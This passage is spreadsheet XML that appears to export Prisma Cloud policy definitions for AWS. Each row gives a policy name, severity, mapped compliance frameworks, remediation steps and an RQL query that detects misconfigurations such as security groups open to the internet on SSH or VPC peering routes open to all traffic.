v1.5.0 (AWS) - Level 2, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, MITRE ATT&amp;CK v10.0 [Deprecated], Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, Copy of CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, CRI Profile v2.0, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, SOC 2, kashan ACSC Information Security Manual (ISM), MPAA Content Protection Best Practices, Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], NIST 800-53 Rev4, Matt's ATT&amp;ACK, SOC 2, NIST 800-53 Rev 5, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, MLPS 2.0 (Level 3), NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CIS v2.0.0 (AWS) - Level 2, ISO/IEC 27002:2013, NIST CSF, CSA CCM v.4.0.1, ISO/IEC 27001:2022, TX-RAMP Level 1, NIST CSF, ISO 27002:2022, Copy of CIS Controls v8, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), HITRUST CSF v.9.6.0, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, Australian Energy Sector Cyber Security Framework (AESCSF), CyberSecurity Law of the People's Republic of China, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), MTSBv2_AWS, FFIEC, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B1833" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1833" s="2" t="inlineStr"/>
      <c r="D1833" t="inlineStr"/>
      <c r="E1833" t="inlineStr"/>
      <c r="F1833" t="inlineStr"/>
      <c r="G1833" t="b">
        <v>1</v>
      </c>
      <c r="H18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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1833" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1833" t="inlineStr">
        <is>
          <t>AWS route table with VPC peering overly permissive to all traffic</t>
        </is>
      </c>
      <c r="L1833" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1833" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1833" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1833" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1833" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1833" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="R1833" t="inlineStr">
        <is>
          <t>5.4</t>
        </is>
      </c>
      <c r="S1833" t="inlineStr"/>
      <c r="T1833" t="b">
        <v>0</v>
      </c>
      <c r="U1833" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1833" t="inlineStr">
        <is>
          <t>aws-ec2-describe-route-tables</t>
        </is>
      </c>
      <c r="W1833" t="inlineStr">
        <is>
          <t>This policy identifies VPC route tables with VPC peering connection  which are overly permissive to all traffic. Being highly selective in peering routing tables is a very effective way of minimizing the impact of breach as resources outside of these routes are inaccessible to the peered VPC.</t>
        </is>
      </c>
      <c r="X1833" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated.
3. Navigate to 'VPC' dashboard from 'Services' dropdown
4. From left menu, select 'Route Tables'
5. Click on the alerted route table
6. From top click on 'Action' button
7. From the Action menu dropdown, select 'Edit routes'
8. From the list of destination remove the extra permissive destination by clicking the cross symbol available for that destination
9. Add a destination with 'least access'
10. Click on 'Save Routes'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic</t>
        </is>
      </c>
      <c r="Y1833" t="inlineStr"/>
      <c r="Z1833" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-route-tables' AND json.rule = "routes[*].vpcPeeringConnectionId exists and routes[?(@.destinationCidrBlock=='0.0.0.0/0' || @.destinationIpv6CidrBlock == '::/0')].vpcPeeringConnectionId starts with pcx"
{"category":"Networking","resourceTypes":["aws_route_table","aws_route"]}</t>
        </is>
      </c>
      <c r="AA1833" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1833" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1833" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-418-CKV2_AWS_44</t>
        </is>
      </c>
      <c r="AD1833" t="b">
        <v>1</v>
      </c>
      <c r="AE1833" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1833" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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3" t="inlineStr">
        <is>
          <t>8d403b9b-794b-4516-84fa-e9415155fb27</t>
        </is>
      </c>
      <c r="AI1833" t="inlineStr">
        <is>
          <t>307c7a74-7fed-4087-b0b0-2215d690267b</t>
        </is>
      </c>
      <c r="AJ1833" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1833" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1834">
      <c r="A1834" t="inlineStr"/>
      <c r="B1834" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1834" s="2" t="inlineStr"/>
      <c r="D1834" t="inlineStr"/>
      <c r="E1834" t="inlineStr"/>
      <c r="F1834" t="inlineStr"/>
      <c r="G1834" t="b">
        <v>0</v>
      </c>
      <c r="H18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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1834" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1834" t="inlineStr">
        <is>
          <t>policy-umbrella-3939</t>
        </is>
      </c>
      <c r="L1834" t="inlineStr"/>
      <c r="M1834" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1834" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1834" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1834" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1834" t="inlineStr"/>
      <c r="R1834" t="inlineStr"/>
      <c r="S1834" t="inlineStr"/>
      <c r="T1834" t="b">
        <v>0</v>
      </c>
      <c r="U1834" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1834" t="inlineStr">
        <is>
          <t>aws-ec2-describe-security-groups</t>
        </is>
      </c>
      <c r="W1834" t="inlineStr"/>
      <c r="X1834" t="inlineStr"/>
      <c r="Y1834" t="inlineStr"/>
      <c r="Z1834" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.account = 'acg-umbrella-3939' and api.name = 'aws-ec2-describe-security-groups' AND json.rule = ipPermissions[*].toPort is not member of (443,80)</t>
        </is>
      </c>
      <c r="AA1834" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1834" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1834" t="inlineStr"/>
      <c r="AD1834" t="b">
        <v>0</v>
      </c>
      <c r="AE1834" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1834" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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4" t="inlineStr">
        <is>
          <t>c5f0764c-ce8c-453a-8e8a-dc99c066b306</t>
        </is>
      </c>
      <c r="AI1834" t="inlineStr">
        <is>
          <t>bc4368e5-10e6-4c46-91f6-f07d8e41e510</t>
        </is>
      </c>
      <c r="AJ1834" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1834" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1835">
      <c r="A1835" t="inlineStr"/>
      <c r="B1835" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1835" s="2" t="inlineStr"/>
      <c r="D1835" t="inlineStr"/>
      <c r="E1835" t="inlineStr"/>
      <c r="F1835" t="inlineStr"/>
      <c r="G1835" t="b">
        <v>1</v>
      </c>
      <c r="H18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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1835" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1835" t="inlineStr">
        <is>
          <t>JEC-Find all Security Groups that opens port 22 to the internet (and are attached to an EC2 instance).</t>
        </is>
      </c>
      <c r="L1835" t="inlineStr"/>
      <c r="M1835" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1835" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1835" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1835" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1835" t="inlineStr"/>
      <c r="R1835" t="inlineStr"/>
      <c r="S1835" t="inlineStr"/>
      <c r="T1835" t="b">
        <v>0</v>
      </c>
      <c r="U1835" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1835" t="inlineStr">
        <is>
          <t>aws-ec2-describe-security-groups</t>
        </is>
      </c>
      <c r="W1835" t="inlineStr">
        <is>
          <t>testing filter usage in plicies and alert rules</t>
        </is>
      </c>
      <c r="X1835" t="inlineStr"/>
      <c r="Y1835" t="inlineStr"/>
      <c r="Z1835" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name='aws-ec2-describe-security-groups' as X; config from cloud.resource where api.name = 'aws-ec2-describe-instances' as Y;filter '$.X.ipPermissions[*].toPort == 22 and $.X.ipPermissions[*].ipRanges[*] contains 0.0.0.0/0 and $.Y.securityGroups[*].groupId == $.X.groupId' ;show X;</t>
        </is>
      </c>
      <c r="AA1835" t="inlineStr">
        <is>
          <t>Jonathan Calloway</t>
        </is>
      </c>
      <c r="AB1835" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1835" t="inlineStr"/>
      <c r="AD1835" t="b">
        <v>0</v>
      </c>
      <c r="AE1835" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1835" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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5" t="inlineStr">
        <is>
          <t>a40ec4e5-c388-4dbf-a36f-672f65681b06</t>
        </is>
      </c>
      <c r="AI1835" t="inlineStr">
        <is>
          <t>fcf15847-0000-4026-9c4d-21d7b717c50a</t>
        </is>
      </c>
      <c r="AJ1835" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1835" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1836">
      <c r="A1836" t="inlineStr"/>
      <c r="B1836" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1836" s="2" t="inlineStr"/>
      <c r="D1836" t="inlineStr"/>
      <c r="E1836" t="inlineStr"/>
      <c r="F1836" t="inlineStr"/>
      <c r="G1836" t="b">
        <v>0</v>
      </c>
      <c r="H18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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1836" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1836" t="inlineStr">
        <is>
          <t>KLopez - AWS Security Group allows all traffic on SSH port (22)</t>
        </is>
      </c>
      <c r="L1836" t="inlineStr"/>
      <c r="M1836" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1836" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1836" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1836" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1836" t="inlineStr"/>
      <c r="R1836" t="inlineStr"/>
      <c r="S1836" t="inlineStr"/>
      <c r="T1836" t="b">
        <v>0</v>
      </c>
      <c r="U1836" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1836" t="inlineStr">
        <is>
          <t>aws-ec2-describe-security-groups</t>
        </is>
      </c>
      <c r="W1836" t="inlineStr"/>
      <c r="X1836" t="inlineStr"/>
      <c r="Y1836" t="inlineStr"/>
      <c r="Z1836" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-ec2-describe-security-groups' AND json.rule = isShared is false and (ipPermissions[?any((ipRanges[*] contains 0.0.0.0/0 or ipv6Ranges[*].cidrIpv6 contains ::/0) and ((toPort == 22 or fromPort == 22) or (toPort &gt; 22 and fromPort &lt; 22)))] exists)</t>
        </is>
      </c>
      <c r="AA1836" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1836" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1836" t="inlineStr"/>
      <c r="AD1836" t="b">
        <v>0</v>
      </c>
      <c r="AE1836" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1836" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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6" t="inlineStr">
        <is>
          <t>9fa11799-2a23-4db2-90bd-2f4003781a15</t>
        </is>
      </c>
      <c r="AI1836" t="inlineStr">
        <is>
          <t>4d083cb0-66f0-4f56-b0ab-bae4206989e3</t>
        </is>
      </c>
      <c r="AJ1836" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1836" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1837">
      <c r="A1837" t="inlineStr"/>
      <c r="B1837" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1837" s="2" t="inlineStr"/>
      <c r="D1837" t="inlineStr"/>
      <c r="E1837" t="inlineStr"/>
      <c r="F1837" t="inlineStr"/>
      <c r="G1837" t="b">
        <v>0</v>
      </c>
      <c r="H18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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1837" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1837" t="inlineStr">
        <is>
          <t>policy-umbrella-6260</t>
        </is>
      </c>
      <c r="L1837" t="inlineStr"/>
      <c r="M1837" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1837" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1837" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1837" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1837" t="inlineStr"/>
      <c r="R1837" t="inlineStr"/>
      <c r="S1837" t="inlineStr"/>
      <c r="T1837" t="b">
        <v>0</v>
      </c>
      <c r="U1837" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1837" t="inlineStr">
        <is>
          <t>aws-ec2-describe-security-groups</t>
        </is>
      </c>
      <c r="W1837" t="inlineStr"/>
      <c r="X1837" t="inlineStr"/>
      <c r="Y1837" t="inlineStr"/>
      <c r="Z1837" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.account = 'acg-umbrella-6260' and api.name = 'aws-ec2-describe-security-groups' AND json.rule = ipPermissions[*].toPort is not member of (443,80)</t>
        </is>
      </c>
      <c r="AA1837" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1837" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1837" t="inlineStr"/>
      <c r="AD1837" t="b">
        <v>0</v>
      </c>
      <c r="AE1837" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1837" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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7" t="inlineStr">
        <is>
          <t>2de277e9-19d6-4a8f-a0f9-f2637f54e394</t>
        </is>
      </c>
      <c r="AI1837" t="inlineStr">
        <is>
          <t>2d5c42f5-c955-4f88-b901-aec59eccb388</t>
        </is>
      </c>
      <c r="AJ1837" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1837" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1838">
      <c r="A1838" t="inlineStr">
        <is>
          <t>CIS Controls v8</t>
        </is>
      </c>
      <c r="B1838" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1838" s="2" t="inlineStr"/>
      <c r="D1838" t="inlineStr"/>
      <c r="E1838" t="inlineStr"/>
      <c r="F1838" t="inlineStr"/>
      <c r="G1838" t="b">
        <v>0</v>
      </c>
      <c r="H18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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1838" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1838" t="inlineStr">
        <is>
          <t>New policy-SG</t>
        </is>
      </c>
      <c r="L1838" t="inlineStr"/>
      <c r="M1838" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1838" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1838" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1838" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1838" t="inlineStr">
        <is>
          <t>CIS Control 1</t>
        </is>
      </c>
      <c r="R1838" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="S1838" t="inlineStr">
        <is>
          <t>New policy</t>
        </is>
      </c>
      <c r="T1838" t="b">
        <v>0</v>
      </c>
      <c r="U1838" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1838" t="inlineStr">
        <is>
          <t>aws-ec2-describe-security-groups</t>
        </is>
      </c>
      <c r="W1838" t="inlineStr">
        <is>
          <t>New policy</t>
        </is>
      </c>
      <c r="X1838" t="inlineStr"/>
      <c r="Y1838" t="inlineStr"/>
      <c r="Z1838" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name='aws-ec2-describe-security-groups' AND json.rule='ipPermissions[?(@.fromPort==0)].ipRanges[*] contains 0.0.0.0/0'</t>
        </is>
      </c>
      <c r="AA1838" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1838" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1838" t="inlineStr"/>
      <c r="AD1838" t="b">
        <v>0</v>
      </c>
      <c r="AE1838" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1838" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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8" t="inlineStr">
        <is>
          <t>f156818f-e8b0-48c5-b160-ad2e23bd28dd</t>
        </is>
      </c>
      <c r="AI1838" t="inlineStr">
        <is>
          <t>8eaafad7-1de3-49af-b405-59d00303397b</t>
        </is>
      </c>
      <c r="AJ1838" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1838" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1839">
      <c r="A1839" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (AWS)</t>
        </is>
      </c>
      <c r="B1839" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1839" s="2" t="inlineStr"/>
      <c r="D1839" t="inlineStr"/>
      <c r="E1839" t="inlineStr"/>
      <c r="F1839" t="inlineStr"/>
      <c r="G1839" t="b">
        <v>0</v>
      </c>
      <c r="H18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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1839" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1839" t="inlineStr">
        <is>
          <t>policy tell bell ca 2</t>
        </is>
      </c>
      <c r="L1839" t="inlineStr"/>
      <c r="M1839" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1839" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1839" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1839" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1839" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="R1839" t="inlineStr">
        <is>
          <t>5.4</t>
        </is>
      </c>
      <c r="S1839" t="inlineStr">
        <is>
          <t>Network,Bell</t>
        </is>
      </c>
      <c r="T1839" t="b">
        <v>0</v>
      </c>
      <c r="U1839" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1839" t="inlineStr">
        <is>
          <t>aws-ec2-describe-security-groups</t>
        </is>
      </c>
      <c r="W1839" t="inlineStr"/>
      <c r="X1839" t="inlineStr"/>
      <c r="Y1839" t="inlineStr"/>
      <c r="Z1839" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name= 'aws-ec2-describe-security-groups' AND json.rule = ipPermissions[?any(ipRanges[*] contains 0.0.0.0/0 )] exists and ownerId does not equal "169752082276"</t>
        </is>
      </c>
      <c r="AA1839" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1839" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1839" t="inlineStr"/>
      <c r="AD1839" t="b">
        <v>0</v>
      </c>
      <c r="AE1839" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1839" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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39" t="inlineStr">
        <is>
          <t>803dd752-dc2c-4a09-af9e-5c8435c27854</t>
        </is>
      </c>
      <c r="AI1839" t="inlineStr">
        <is>
          <t>faf728df-8522-42aa-8e58-8a9f942463ac</t>
        </is>
      </c>
      <c r="AJ1839" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1839" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1840">
      <c r="A1840" t="inlineStr">
        <is>
          <t>CIS AWS 3 Tier Web Architecture Benchmark v.1.0.0, SOC 2</t>
        </is>
      </c>
      <c r="B1840" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1840" s="2" t="inlineStr"/>
      <c r="D1840" t="inlineStr"/>
      <c r="E1840" t="inlineStr"/>
      <c r="F1840" t="inlineStr"/>
      <c r="G1840" t="b">
        <v>0</v>
      </c>
      <c r="H18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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1840" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1840" t="inlineStr">
        <is>
          <t>DM_TEST for all traffic inbound rule ssh</t>
        </is>
      </c>
      <c r="L1840" t="inlineStr"/>
      <c r="M1840" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1840" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1840" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1840" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1840" t="inlineStr">
        <is>
          <t>CC1</t>
        </is>
      </c>
      <c r="R1840" t="inlineStr">
        <is>
          <t>CC1.1</t>
        </is>
      </c>
      <c r="S1840" t="inlineStr">
        <is>
          <t>CIS,aws,CRITICAL</t>
        </is>
      </c>
      <c r="T1840" t="b">
        <v>0</v>
      </c>
      <c r="U1840" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1840" t="inlineStr">
        <is>
          <t>aws-ec2-describe-security-groups</t>
        </is>
      </c>
      <c r="W1840" t="inlineStr">
        <is>
          <t>demo for training</t>
        </is>
      </c>
      <c r="X1840" t="inlineStr"/>
      <c r="Y1840" t="inlineStr"/>
      <c r="Z1840" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-ec2-describe-security-groups' AND json.rule = isShared is false and (ipPermissions[?any((ipRanges[*] contains 0.0.0.0/0 or ipv6Ranges[*].cidrIpv6 contains ::/0) and ((toPort == 22 or fromPort == 22) or (toPort &gt; 22 and fromPort &lt; 22)))] exists)</t>
        </is>
      </c>
      <c r="AA1840" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1840" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1840" t="inlineStr"/>
      <c r="AD1840" t="b">
        <v>0</v>
      </c>
      <c r="AE1840" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1840" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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0" t="inlineStr">
        <is>
          <t>fb1f6d37-8f16-4e1e-9b7e-baa16e301ca4</t>
        </is>
      </c>
      <c r="AI1840" t="inlineStr">
        <is>
          <t>84676943-3f84-4473-bcab-3717812f3553</t>
        </is>
      </c>
      <c r="AJ1840" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1840" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1841">
      <c r="A1841" t="inlineStr">
        <is>
          <t>Zoom-standard-1</t>
        </is>
      </c>
      <c r="B1841" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1841" s="2" t="inlineStr"/>
      <c r="D1841" t="inlineStr"/>
      <c r="E1841" t="inlineStr"/>
      <c r="F1841" t="inlineStr"/>
      <c r="G1841" t="b">
        <v>1</v>
      </c>
      <c r="H18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841" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1841" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1841" t="inlineStr">
        <is>
          <t>Default-test</t>
        </is>
      </c>
      <c r="L1841" t="inlineStr"/>
      <c r="M1841" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1841" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1841" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1841" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1841" t="inlineStr">
        <is>
          <t>600314</t>
        </is>
      </c>
      <c r="R1841" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="S1841" t="inlineStr"/>
      <c r="T1841" t="b">
        <v>0</v>
      </c>
      <c r="U1841" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1841" t="inlineStr">
        <is>
          <t>aws-ec2-describe-snapshots</t>
        </is>
      </c>
      <c r="W1841" t="inlineStr"/>
      <c r="X1841" t="inlineStr"/>
      <c r="Y1841" t="inlineStr"/>
      <c r="Z1841" t="inlineStr">
